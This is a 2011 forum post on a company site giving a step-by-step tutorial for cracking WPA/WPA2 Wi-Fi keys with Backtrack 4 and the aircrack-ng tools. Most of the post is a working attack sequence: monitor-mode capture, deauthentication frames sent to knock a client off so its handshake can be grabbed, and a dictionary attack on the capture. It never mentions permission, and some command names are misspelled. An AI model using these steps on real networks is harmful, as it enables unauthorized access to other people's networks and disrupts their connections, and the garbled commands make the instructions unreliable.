SNB Solutions - Baja California Software Company
Welcome Guest Search | Active Topics | Log In | Register

Tag as favorite
WiFi pen test or How to hack WPA/WPA2 key with Backtrack 4
Options View
Previous Topic Next Topic
stoian_bycovich
#1 Posted : Sunday, January 30, 2011 2:12:11 PM

Rank: Administration

Medals:

Groups: Administrators
Joined: 1/2/2010
Posts: 76
Points: 10,228
Location: Cabo San Lucas

Thanks: 0 times
Was thanked: 0 time(s) in 0 post(s)
Alright let's start first what we need to complete this task:

1. Backtrack 4 life CD/USB or installation;
2. Willing to read all this :)

The first you can download for free from here: http://www.backtrack-linux.org/downloads/.

Username to enter backtrack: root
Password: toor
Type startx and hit ENTER key to fire up the graphic of BT4.

Web need opened 3 terminals and let's start:

1. Airomon-ng stop wlan0 (This command stops the wifi adaptor)

2. Airomon-ng start wlan0 (This command starts the wifi adaptor in monitoring mode)

3. Airodump-ng wlan0 (This command is used only to pick network for test,by signal strenght, channel, BSSID, ESSID. The command is stopped with CTRL+C, we are looking for network WPA or WPA2)

4. Airodump-ng --channel (Channel number) --bssid (MAC address of the network) -w (File name to be saved the captured information) wlan0 (Leave this running and open new terminal)

Here is a good idea to mention that there is two ways to get the key, one to wait for client AP (access point) handshake or two to deauthenticate already connected client and force him to reauthenticate and get the handshake package. Ok, I will assume we were lucky and we get the authentication handshake package then in the top right part of the console we can see this "WPA handshake: 00:14:6C:7E:40:80", where 00:14:6C:7E:40:80 is the MAC address of the access point.

So far so good, but what if we don't get any authentication handshake package? Well, we can force the fortune by deauthenticating already connected client and make him reauthenticate so we can get our hanshake package:

5. aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0

where -0 is sending deauthentication command, 1 is the number of deauthentications to be sent, -a is the MAC address of the AP, -c is the MAC address of the client. Important here is to keep in mind the signal strengh and the distance between you and the client!

6. aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 *.cap Before running airckrack-ng command we need to stop 4. by Ctrl+C and keep in mind that *.cap is the file name that we select for -w parameter in point 4.

-w password.lst is small dictionary list that is comming with aircrack-ng, this dictionary list is optional you can use your own or download one from internet.

Enjoy!
Best regards,
Stoyan Bukovich
Executive manager
SNB Solutions

Cell.: +52 6241 616969
E-mail: s.bucovich@snb-bg.com
Web: www.snb-bg.com
Back to top
WWW BLOG
| Edit by user
Sponsor  
 
Eannouncements.net SNB Solutions Eanuncios.net

Eannouncements.net the place for your announcement.

SNB Solutions - Software and computing services company.

Eanuncios.net el lugar para su anuncio.
Back to top  
Users browsing this topic
Guest (4)
Tag as favorite
Forum Jump  
You cannot post new topics in this forum.
You cannot reply to topics in this forum.
You cannot delete your posts in this forum.
You cannot edit your posts in this forum.
You cannot create polls in this forum.
You cannot vote in polls in this forum.

YAFVision Theme by Jaben Cargman (Tiny Gecko)
Powered by YAF | YAF © 2003-2009, Yet Another Forum.NET